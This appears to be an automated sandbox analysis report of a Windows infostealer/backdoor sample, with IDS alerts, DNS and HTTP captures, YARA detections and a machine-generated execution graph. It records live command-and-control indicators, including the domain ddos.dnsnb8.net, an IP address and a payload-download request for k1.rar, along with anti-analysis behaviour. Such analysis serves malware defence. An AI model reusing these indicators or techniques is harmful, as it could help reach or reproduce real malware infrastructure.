WriteConsoleW, SetStdHandle, FlushFileBuffers, SetFilePointer, HeapReAlloc, FindFirstFileW, CreateFileA, DebugActiveProcess, GetVolumeNameForVolumeMountPointA, CreateActCtxA, ExitProcess, IsValidLocale, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetACP, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, WriteFile, GetStdHandle, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TlsAlloc, TlsGetValue, TlsSetValue, SetLastError, GetCurrentThreadId, FreeEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, CreateFileW
                                        USER32.dllCharToOemBuffA, GetDlgCtrlID, GetAltTabInfoW, DrawCaption, CharUpperW
                                        GDI32.dllGetCharWidthFloatA
                                        ADVAPI32.dllClearEventLogA, RevertToSelf, InitiateSystemShutdownA, AbortSystemShutdownW
                                        SHELL32.dllDragAcceptFiles
                                        ole32.dllCoGetInstanceFromFile
                                        WINHTTP.dllWinHttpGetProxyForUrl, WinHttpWriteData, WinHttpReadData, WinHttpOpen

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        Sami LappishFinland
                                        Sami LappishNorway
                                        Sami LappishSweden

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                        2024-07-26T02:51:47.771172+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971213.85.23.86192.168.2.8
                                        2024-07-26T02:51:33.974086+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49705799192.168.2.844.221.84.105
                                        2024-07-26T02:52:25.910942+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435199613.85.23.86192.168.2.8
                                        2024-07-26T02:51:31.550495+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5444153192.168.2.81.1.1.1
                                        2024-07-26T02:51:30.550429+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5444153192.168.2.81.1.1.1
                                        2024-07-26T02:51:33.550629+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5444153192.168.2.81.1.1.1
                                        2024-07-26T02:51:29.552802+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5444153192.168.2.81.1.1.1

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 26, 2024 02:51:33.580358982 CEST49705799192.168.2.844.221.84.105
                                        Jul 26, 2024 02:51:33.585237026 CEST7994970544.221.84.105192.168.2.8
                                        Jul 26, 2024 02:51:33.585364103 CEST49705799192.168.2.844.221.84.105
                                        Jul 26, 2024 02:51:33.585599899 CEST49705799192.168.2.844.221.84.105
                                        Jul 26, 2024 02:51:33.590390921 CEST7994970544.221.84.105192.168.2.8
                                        Jul 26, 2024 02:51:33.974029064 CEST7994970544.221.84.105192.168.2.8
                                        Jul 26, 2024 02:51:33.974086046 CEST49705799192.168.2.844.221.84.105
                                        Jul 26, 2024 02:51:33.981743097 CEST7994970544.221.84.105192.168.2.8
                                        Jul 26, 2024 02:51:33.981796026 CEST49705799192.168.2.844.221.84.105
                                        Jul 26, 2024 02:51:40.065602064 CEST49705799192.168.2.844.221.84.105

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 26, 2024 02:51:29.552802086 CEST5444153192.168.2.81.1.1.1
                                        Jul 26, 2024 02:51:30.550429106 CEST5444153192.168.2.81.1.1.1
                                        Jul 26, 2024 02:51:31.550494909 CEST5444153192.168.2.81.1.1.1
                                        Jul 26, 2024 02:51:33.550628901 CEST5444153192.168.2.81.1.1.1
                                        Jul 26, 2024 02:51:33.562335014 CEST53544411.1.1.1192.168.2.8
                                        Jul 26, 2024 02:51:33.562350988 CEST53544411.1.1.1192.168.2.8
                                        Jul 26, 2024 02:51:33.562361002 CEST53544411.1.1.1192.168.2.8
                                        Jul 26, 2024 02:51:33.562371016 CEST53544411.1.1.1192.168.2.8
                                        Jul 26, 2024 02:51:48.177746058 CEST53640271.1.1.1192.168.2.8

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 26, 2024 02:51:29.552802086 CEST192.168.2.81.1.1.10x495fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:30.550429106 CEST192.168.2.81.1.1.10x495fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:31.550494909 CEST192.168.2.81.1.1.10x495fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:33.550628901 CEST192.168.2.81.1.1.10x495fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 26, 2024 02:51:33.562335014 CEST1.1.1.1192.168.2.80x495fNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:33.562350988 CEST1.1.1.1192.168.2.80x495fNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:33.562361002 CEST1.1.1.1192.168.2.80x495fNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                        Jul 26, 2024 02:51:33.562371016 CEST1.1.1.1192.168.2.80x495fNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • ddos.dnsnb8.net:799

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.84970544.221.84.1057997496C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        TimestampBytes transferredDirectionData
                                        Jul 26, 2024 02:51:33.585599899 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: ddos.dnsnb8.net:799
                                        Connection: Keep-Alive


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:20:51:27
                                        Start date:25/07/2024
                                        Path:C:\Users\user\Desktop\7Y18r(193).exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\7Y18r(193).exe"
                                        Imagebase:0x400000
                                        File size:217'088 bytes
                                        MD5 hash:3A085E2C496B3D2020401C3452B57AEF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:20:51:27
                                        Start date:25/07/2024
                                        Path:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        Imagebase:0x700000
                                        File size:15'872 bytes
                                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 92%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:20:51:32
                                        Start date:25/07/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
                                        Imagebase:0x140000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:20:51:34
                                        Start date:25/07/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528
                                        Imagebase:0x140000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:4.1%
                                          Dynamic/Decrypted Code Coverage:56.9%
                                          Signature Coverage:2.8%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:15
                                          execution_graph 23592 890001 23593 890005 23592->23593 23598 89092b GetPEB 23593->23598 23595 890030 23600 89003c 23595->23600 23599 890972 23598->23599 23599->23595 23601 890049 23600->23601 23602 890e0f 2 API calls 23601->23602 23603 890223 23602->23603 23604 890d90 GetPEB 23603->23604 23605 890238 VirtualAlloc 23604->23605 23606 890265 23605->23606 23607 8902ce VirtualProtect 23606->23607 23609 89030b 23607->23609 23608 890439 VirtualFree 23612 8904be LoadLibraryA 23608->23612 23609->23608 23611 8908c7 23612->23611 21009 89003c 21010 890049 21009->21010 21022 890e0f SetErrorMode SetErrorMode 21010->21022 21015 890265 21016 8902ce VirtualProtect 21015->21016 21018 89030b 21016->21018 21017 890439 VirtualFree 21021 8904be LoadLibraryA 21017->21021 21018->21017 21020 8908c7 21021->21020 21023 890223 21022->21023 21024 890d90 21023->21024 21025 890dad 21024->21025 21026 890dbb GetPEB 21025->21026 21027 890238 VirtualAlloc 21025->21027 21026->21027 21027->21015 21028 8e55c6 21031 8e55d7 21028->21031 21032 8e55e6 21031->21032 21035 8e5d77 21032->21035 21037 8e5d92 21035->21037 21036 8e5d9b CreateToolhelp32Snapshot 21036->21037 21038 8e5db7 Module32First 21036->21038 21037->21036 21037->21038 21039 8e55d6 21038->21039 21040 8e5dc6 21038->21040 21042 8e5a36 21040->21042 21043 8e5a61 21042->21043 21044 8e5aaa 21043->21044 21045 8e5a72 VirtualAlloc 21043->21045 21044->21044 21045->21044 17672 401130 17679 4107d0 GetProcessHeap RtlAllocateHeap GetComputerNameA 17672->17679 17674 40113e 17675 40116c 17674->17675 17681 410790 GetProcessHeap RtlAllocateHeap GetUserNameA 17674->17681 17677 401157 17677->17675 17678 401164 ExitProcess 17677->17678 17680 410806 17679->17680 17680->17674 17681->17677 17682 410430 17728 401f50 17682->17728 17690 410452 17691 410456 ExitProcess 17690->17691 17692 41045e 17690->17692 17834 401170 17692->17834 17704 410481 17705 4107d0 3 API calls 17704->17705 17706 410494 17705->17706 17861 413260 17706->17861 17708 4104b5 17709 413260 4 API calls 17708->17709 17710 4104bc 17709->17710 17711 413260 4 API calls 17710->17711 17712 4104c3 17711->17712 17713 413260 4 API calls 17712->17713 17714 4104ca 17713->17714 17715 413260 4 API calls 17714->17715 17716 4104d1 17715->17716 17869 413150 17716->17869 17718 41055d 17873 410360 GetSystemTime 17718->17873 17719 4104da 17719->17718 17721 410513 OpenEventA 17719->17721 17723 410546 CloseHandle Sleep 17721->17723 17724 41052a 17721->17724 17723->17719 17727 410532 CreateEventA 17724->17727 17727->17718 18014 403810 17728->18014 17730 401f67 17731 403810 2 API calls 17730->17731 17732 401f79 17731->17732 17733 403810 2 API calls 17732->17733 17734 401f8b 17733->17734 17735 403810 2 API calls 17734->17735 17736 401f9d 17735->17736 17737 403810 2 API calls 17736->17737 17738 401faf 17737->17738 17739 403810 2 API calls 17738->17739 17740 401fc1 17739->17740 17741 403810 2 API calls 17740->17741 17742 401fd3 17741->17742 17743 403810 2 API calls 17742->17743 17744 401fe5 17743->17744 17745 403810 2 API calls 17744->17745 17746 401ff7 17745->17746 17747 403810 2 API calls 17746->17747 17748 402009 17747->17748 17749 403810 2 API calls 17748->17749 17750 40201b 17749->17750 17751 403810 2 API calls 17750->17751 17752 40202d 17751->17752 17753 403810 2 API calls 17752->17753 17754 40203f 17753->17754 17755 403810 2 API calls 17754->17755 17756 402051 17755->17756 17757 403810 2 API calls 17756->17757 17758 402063 17757->17758 17759 403810 2 API calls 17758->17759 17760 402075 17759->17760 17761 403810 2 API calls 17760->17761 17762 402087 17761->17762 17763 403810 2 API calls 17762->17763 17764 402099 17763->17764 17765 403810 2 API calls 17764->17765 17766 4020ab 17765->17766 17767 403810 2 API calls 17766->17767 17768 4020bd 17767->17768 17769 403810 2 API calls 17768->17769 17770 4020cf 17769->17770 17771 403810 2 API calls 17770->17771 17772 4020e1 17771->17772 17773 403810 2 API calls 17772->17773 17774 4020f3 17773->17774 17775 403810 2 API calls 17774->17775 17776 402105 17775->17776 17777 403810 2 API calls 17776->17777 17778 402117 17777->17778 17779 403810 2 API calls 17778->17779 17780 402129 17779->17780 17781 403810 2 API calls 17780->17781 17782 40213b 17781->17782 17783 403810 2 API calls 17782->17783 17784 40214d 17783->17784 17785 403810 2 API calls 17784->17785 17786 40215f 17785->17786 17787 403810 2 API calls 17786->17787 17788 402171 17787->17788 17789 403810 2 API calls 17788->17789 17790 402183 17789->17790 17791 403810 2 API calls 17790->17791 17792 402195 17791->17792 17793 403810 2 API calls 17792->17793 17794 4021a7 17793->17794 17795 403810 2 API calls 17794->17795 17796 4021b9 17795->17796 17797 403810 2 API calls 17796->17797 17798 4021cb 17797->17798 17799 403810 2 API calls 17798->17799 17800 4021dd 17799->17800 17801 403810 2 API calls 17800->17801 17802 4021ef 17801->17802 17803 403810 2 API calls 17802->17803 17804 402201 17803->17804 17805 403810 2 API calls 17804->17805 17806 402213 17805->17806 17807 403810 2 API calls 17806->17807 17808 402225 17807->17808 17809 403810 2 API calls 17808->17809 17810 402237 17809->17810 17811 403810 2 API calls 17810->17811 17812 402249 17811->17812 17813 412180 17812->17813 18019 412070 GetPEB 17813->18019 17815 412188 17816 4123b3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 17815->17816 17817 41219a 17815->17817 17818 412414 GetProcAddress 17816->17818 17819 41242d 17816->17819 17820 4121ac 21 API calls 17817->17820 17818->17819 17821 412466 17819->17821 17822 412436 GetProcAddress GetProcAddress 17819->17822 17820->17816 17823 412488 17821->17823 17824 41246f GetProcAddress 17821->17824 17822->17821 17825 412491 GetProcAddress 17823->17825 17826 4124a9 17823->17826 17824->17823 17825->17826 17827 410440 17826->17827 17828 4124b2 GetProcAddress GetProcAddress 17826->17828 17829 412ff0 17827->17829 17828->17827 17830 413000 17829->17830 17831 41044d 17830->17831 17832 41302e lstrcpy 17830->17832 17833 401240 GetPEB 17831->17833 17832->17831 17833->17690 17835 401188 17834->17835 17836 4011b7 17835->17836 17837 4011af ExitProcess 17835->17837 17838 401100 GetSystemInfo 17836->17838 17839 401124 17838->17839 17840 40111c ExitProcess 17838->17840 17841 4010b0 GetCurrentProcess VirtualAllocExNuma 17839->17841 17842 4010e1 ExitProcess 17841->17842 17843 4010e9 17841->17843 18020 401040 VirtualAlloc 17843->18020 17846 4011c0 18024 411400 17846->18024 17849 4011e9 __aulldiv 17850 40123a 17849->17850 17851 401232 ExitProcess 17849->17851 17852 4101b0 GetUserDefaultLangID 17850->17852 17853 410213 GetUserDefaultLangID 17852->17853 17854 4101d2 17852->17854 17860 410790 GetProcessHeap RtlAllocateHeap GetUserNameA 17853->17860 17854->17853 17855 410201 ExitProcess 17854->17855 17856 4101e3 ExitProcess 17854->17856 17857 4101f7 ExitProcess 17854->17857 17858 41020b ExitProcess 17854->17858 17859 4101ed ExitProcess 17854->17859 17858->17853 17860->17704 18026 412fc0 17861->18026 17863 413271 lstrlen 17865 413290 17863->17865 17864 4132c8 18027 413050 17864->18027 17865->17864 17867 4132aa lstrcpy lstrcat 17865->17867 17867->17864 17868 4132d4 17868->17708 17870 41316b 17869->17870 17871 4131bb 17870->17871 17872 4131a9 lstrcpy 17870->17872 17871->17719 17872->17871 18031 410260 17873->18031 17875 4103ce 17876 4103d8 sscanf 17875->17876 18060 4130b0 17876->18060 17878 4103ea SystemTimeToFileTime SystemTimeToFileTime 17879 410420 17878->17879 17880 41040e 17878->17880 17882 40f9a0 17879->17882 17880->17879 17881 410418 ExitProcess 17880->17881 17883 40f9ad 17882->17883 17884 412ff0 lstrcpy 17883->17884 17885 40f9bb 17884->17885 18062 4130d0 lstrlen 17885->18062 17888 4130d0 2 API calls 17889 40f9dd 17888->17889 17890 4130d0 2 API calls 17889->17890 17891 40f9ea 17890->17891 17892 4130d0 2 API calls 17891->17892 17893 40f9f7 17892->17893 18066 402260 17893->18066 17898 4130d0 2 API calls 17899 40fac5 17898->17899 17900 413260 4 API calls 17899->17900 17901 40fadb 17900->17901 17902 413150 lstrcpy 17901->17902 17903 40fae4 17902->17903 17904 412ff0 lstrcpy 17903->17904 17905 40fb01 17904->17905 17906 413260 4 API calls 17905->17906 17907 40fb1a 17906->17907 17908 413150 lstrcpy 17907->17908 17909 40fb26 17908->17909 17910 413260 4 API calls 17909->17910 17911 40fb4a 17910->17911 17912 413150 lstrcpy 17911->17912 17913 40fb56 17912->17913 17914 412ff0 lstrcpy 17913->17914 17915 40fb7b 17914->17915 18710 410590 17915->18710 17918 413050 lstrcpy 17919 40fb92 17918->17919 18718 403990 17919->18718 17921 40fb98 18850 40bcb0 17921->18850 17923 40fba0 17924 412ff0 lstrcpy 17923->17924 17925 40fbc3 17924->17925 18859 401950 17925->18859 17929 40fbd7 19002 40b5a0 17929->19002 17931 40fbdf 17932 412ff0 lstrcpy 17931->17932 17933 40fc03 17932->17933 17934 401950 lstrcpy 17933->17934 17935 40fc11 17934->17935 17936 404a70 25 API calls 17935->17936 17937 40fc17 17936->17937 19009 40b3f0 17937->19009 17939 40fc1f 17940 401950 lstrcpy 17939->17940 17941 40fc30 17940->17941 19016 40bee0 17941->19016 17943 40fc35 17944 412ff0 lstrcpy 17943->17944 17945 40fc4e 17944->17945 19355 4040c0 GetProcessHeap RtlAllocateHeap 17945->19355 17947 40fc53 17948 401950 lstrcpy 17947->17948 17949 40fcc0 17948->17949 19357 40b130 17949->19357 17951 40fcc5 17952 412ff0 lstrcpy 17951->17952 17953 40fce8 17952->17953 17954 401950 lstrcpy 17953->17954 17955 40fcf6 17954->17955 17956 404a70 25 API calls 17955->17956 17957 40fcfc 17956->17957 19410 40b6c0 17957->19410 17959 40fd04 17960 401950 lstrcpy 17959->17960 17961 40fd38 17960->17961 19417 401a10 17961->19417 17963 40fd3d 17964 412ff0 lstrcpy 17963->17964 17965 40fd61 17964->17965 17966 401950 lstrcpy 17965->17966 17967 40fd6f 17966->17967 17968 404a70 25 API calls 17967->17968 17969 40fd75 17968->17969 19423 40b800 17969->19423 17971 40fd7d 18015 40381e 18014->18015 18016 403833 malloc 18015->18016 18017 403850 18016->18017 18018 403860 malloc 18017->18018 18018->17730 18019->17815 18022 401062 18020->18022 18021 40109d 18021->17846 18022->18021 18023 401082 VirtualFree 18022->18023 18023->18021 18025 4011d3 GlobalMemoryStatusEx 18024->18025 18025->17849 18026->17863 18028 413072 18027->18028 18029 41309c 18028->18029 18030 41308a lstrcpy 18028->18030 18029->17868 18030->18029 18032 412ff0 lstrcpy 18031->18032 18033 410273 18032->18033 18034 413260 4 API calls 18033->18034 18035 410285 18034->18035 18036 413150 lstrcpy 18035->18036 18037 41028e 18036->18037 18038 413260 4 API calls 18037->18038 18039 4102a7 18038->18039 18040 413150 lstrcpy 18039->18040 18041 4102b0 18040->18041 18042 413260 4 API calls 18041->18042 18043 4102ca 18042->18043 18044 413150 lstrcpy 18043->18044 18045 4102d3 18044->18045 18046 413260 4 API calls 18045->18046 18047 4102ec 18046->18047 18048 413150 lstrcpy 18047->18048 18049 4102f5 18048->18049 18050 413260 4 API calls 18049->18050 18051 41030f 18050->18051 18052 413150 lstrcpy 18051->18052 18053 410318 18052->18053 18054 413260 4 API calls 18053->18054 18055 410333 18054->18055 18056 413150 lstrcpy 18055->18056 18057 41033c 18056->18057 18058 413050 lstrcpy 18057->18058 18059 410350 18058->18059 18059->17875 18061 4130c2 18060->18061 18061->17878 18063 4130ef 18062->18063 18064 40f9d0 18063->18064 18065 41312b lstrcpy 18063->18065 18064->17888 18065->18064 18067 403810 2 API calls 18066->18067 18068 40226d 18067->18068 18069 403810 2 API calls 18068->18069 18070 40227f 18069->18070 18071 403810 2 API calls 18070->18071 18072 402291 18071->18072 18073 403810 2 API calls 18072->18073 18074 4022a3 18073->18074 18075 403810 2 API calls 18074->18075 18076 4022b5 18075->18076 18077 403810 2 API calls 18076->18077 18078 4022c7 18077->18078 18079 403810 2 API calls 18078->18079 18080 4022d9 18079->18080 18081 403810 2 API calls 18080->18081 18082 4022eb 18081->18082 18083 403810 2 API calls 18082->18083 18084 4022fd 18083->18084 18085 403810 2 API calls 18084->18085 18086 40230f 18085->18086 18087 403810 2 API calls 18086->18087 18088 402321 18087->18088 18089 403810 2 API calls 18088->18089 18090 402333 18089->18090 18091 403810 2 API calls 18090->18091 18092 402345 18091->18092 18093 403810 2 API calls 18092->18093 18094 402357 18093->18094 18095 403810 2 API calls 18094->18095 18096 402369 18095->18096 18097 403810 2 API calls 18096->18097 18098 40237b 18097->18098 18099 403810 2 API calls 18098->18099 18100 40238d 18099->18100 18101 403810 2 API calls 18100->18101 18102 40239f 18101->18102 18103 403810 2 API calls 18102->18103 18104 4023b1 18103->18104 18105 403810 2 API calls 18104->18105 18106 4023c3 18105->18106 18107 403810 2 API calls 18106->18107 18108 4023d5 18107->18108 18109 403810 2 API calls 18108->18109 18110 4023e7 18109->18110 18111 403810 2 API calls 18110->18111 18112 4023f9 18111->18112 18113 403810 2 API calls 18112->18113 18114 40240b 18113->18114 18115 403810 2 API calls 18114->18115 18116 40241d 18115->18116 18117 403810 2 API calls 18116->18117 18118 40242f 18117->18118 18119 403810 2 API calls 18118->18119 18120 402441 18119->18120 18121 403810 2 API calls 18120->18121 18122 402453 18121->18122 18123 403810 2 API calls 18122->18123 18124 402465 18123->18124 18125 403810 2 API calls 18124->18125 18126 402477 18125->18126 18127 403810 2 API calls 18126->18127 18128 402489 18127->18128 18129 403810 2 API calls 18128->18129 18130 40249b 18129->18130 18131 403810 2 API calls 18130->18131 18132 4024ad 18131->18132 18133 403810 2 API calls 18132->18133 18134 4024bf 18133->18134 18135 403810 2 API calls 18134->18135 18136 4024d1 18135->18136 18137 403810 2 API calls 18136->18137 18138 4024e3 18137->18138 18139 403810 2 API calls 18138->18139 18140 4024f5 18139->18140 18141 403810 2 API calls 18140->18141 18142 402507 18141->18142 18143 403810 2 API calls 18142->18143 18144 402519 18143->18144 18145 403810 2 API calls 18144->18145 18146 40252b 18145->18146 18147 403810 2 API calls 18146->18147 18148 40253d 18147->18148 18149 403810 2 API calls 18148->18149 18150 40254f 18149->18150 18151 403810 2 API calls 18150->18151 18152 402561 18151->18152 18153 403810 2 API calls 18152->18153 18154 402573 18153->18154 18155 403810 2 API calls 18154->18155 18156 402585 18155->18156 18157 403810 2 API calls 18156->18157 18158 402597 18157->18158 18159 403810 2 API calls 18158->18159 18160 4025a9 18159->18160 18161 403810 2 API calls 18160->18161 18162 4025bb 18161->18162 18163 403810 2 API calls 18162->18163 18164 4025cd 18163->18164 18165 403810 2 API calls 18164->18165 18166 4025df 18165->18166 18167 403810 2 API calls 18166->18167 18168 4025f1 18167->18168 18169 403810 2 API calls 18168->18169 18170 402603 18169->18170 18171 403810 2 API calls 18170->18171 18172 402615 18171->18172 18173 403810 2 API calls 18172->18173 18174 402627 18173->18174 18175 403810 2 API calls 18174->18175 18176 402639 18175->18176 18177 403810 2 API calls 18176->18177 18178 40264b 18177->18178 18179 403810 2 API calls 18178->18179 18180 40265d 18179->18180 18181 403810 2 API calls 18180->18181 18182 40266f 18181->18182 18183 403810 2 API calls 18182->18183 18184 402681 18183->18184 18185 403810 2 API calls 18184->18185 18186 402693 18185->18186 18187 403810 2 API calls 18186->18187 18188 4026a5 18187->18188 18189 403810 2 API calls 18188->18189 18190 4026b7 18189->18190 18191 403810 2 API calls 18190->18191 18192 4026c9 18191->18192 18193 403810 2 API calls 18192->18193 18194 4026db 18193->18194 18195 403810 2 API calls 18194->18195 18196 4026ed 18195->18196 18197 403810 2 API calls 18196->18197 18198 4026ff 18197->18198 18199 403810 2 API calls 18198->18199 18200 402711 18199->18200 18201 403810 2 API calls 18200->18201 18202 402723 18201->18202 18203 403810 2 API calls 18202->18203 18204 402735 18203->18204 18205 403810 2 API calls 18204->18205 18206 402747 18205->18206 18207 403810 2 API calls 18206->18207 18208 402759 18207->18208 18209 403810 2 API calls 18208->18209 18210 40276b 18209->18210 18211 403810 2 API calls 18210->18211 18212 40277d 18211->18212 18213 403810 2 API calls 18212->18213 18214 40278f 18213->18214 18215 403810 2 API calls 18214->18215 18216 4027a1 18215->18216 18217 403810 2 API calls 18216->18217 18218 4027b3 18217->18218 18219 403810 2 API calls 18218->18219 18220 4027c5 18219->18220 18221 403810 2 API calls 18220->18221 18222 4027d7 18221->18222 18223 403810 2 API calls 18222->18223 18224 4027e9 18223->18224 18225 403810 2 API calls 18224->18225 18226 4027fb 18225->18226 18227 403810 2 API calls 18226->18227 18228 40280d 18227->18228 18229 403810 2 API calls 18228->18229 18230 40281f 18229->18230 18231 403810 2 API calls 18230->18231 18232 402831 18231->18232 18233 403810 2 API calls 18232->18233 18234 402843 18233->18234 18235 403810 2 API calls 18234->18235 18236 402855 18235->18236 18237 403810 2 API calls 18236->18237 18238 402867 18237->18238 18239 403810 2 API calls 18238->18239 18240 402879 18239->18240 18241 403810 2 API calls 18240->18241 18242 40288b 18241->18242 18243 403810 2 API calls 18242->18243 18244 40289d 18243->18244 18245 403810 2 API calls 18244->18245 18246 4028af 18245->18246 18247 403810 2 API calls 18246->18247 18248 4028c1 18247->18248 18249 403810 2 API calls 18248->18249 18250 4028d3 18249->18250 18251 403810 2 API calls 18250->18251 18252 4028e5 18251->18252 18253 403810 2 API calls 18252->18253 18254 4028f7 18253->18254 18255 403810 2 API calls 18254->18255 18256 402909 18255->18256 18257 403810 2 API calls 18256->18257 18258 40291b 18257->18258 18259 403810 2 API calls 18258->18259 18260 40292d 18259->18260 18261 403810 2 API calls 18260->18261 18262 40293f 18261->18262 18263 403810 2 API calls 18262->18263 18264 402951 18263->18264 18265 403810 2 API calls 18264->18265 18266 402963 18265->18266 18267 403810 2 API calls 18266->18267 18268 402975 18267->18268 18269 403810 2 API calls 18268->18269 18270 402987 18269->18270 18271 403810 2 API calls 18270->18271 18272 402999 18271->18272 18273 403810 2 API calls 18272->18273 18274 4029ab 18273->18274 18275 403810 2 API calls 18274->18275 18276 4029bd 18275->18276 18277 403810 2 API calls 18276->18277 18278 4029cf 18277->18278 18279 403810 2 API calls 18278->18279 18280 4029e1 18279->18280 18281 403810 2 API calls 18280->18281 18282 4029f3 18281->18282 18283 403810 2 API calls 18282->18283 18284 402a05 18283->18284 18285 403810 2 API calls 18284->18285 18286 402a17 18285->18286 18287 403810 2 API calls 18286->18287 18288 402a29 18287->18288 18289 403810 2 API calls 18288->18289 18290 402a3b 18289->18290 18291 403810 2 API calls 18290->18291 18292 402a4d 18291->18292 18293 403810 2 API calls 18292->18293 18294 402a5f 18293->18294 18295 403810 2 API calls 18294->18295 18296 402a71 18295->18296 18297 403810 2 API calls 18296->18297 18298 402a83 18297->18298 18299 403810 2 API calls 18298->18299 18300 402a95 18299->18300 18301 403810 2 API calls 18300->18301 18302 402aa7 18301->18302 18303 403810 2 API calls 18302->18303 18304 402ab9 18303->18304 18305 403810 2 API calls 18304->18305 18306 402acb 18305->18306 18307 403810 2 API calls 18306->18307 18308 402add 18307->18308 18309 403810 2 API calls 18308->18309 18310 402aef 18309->18310 18311 403810 2 API calls 18310->18311 18312 402b01 18311->18312 18313 403810 2 API calls 18312->18313 18314 402b13 18313->18314 18315 403810 2 API calls 18314->18315 18316 402b25 18315->18316 18317 403810 2 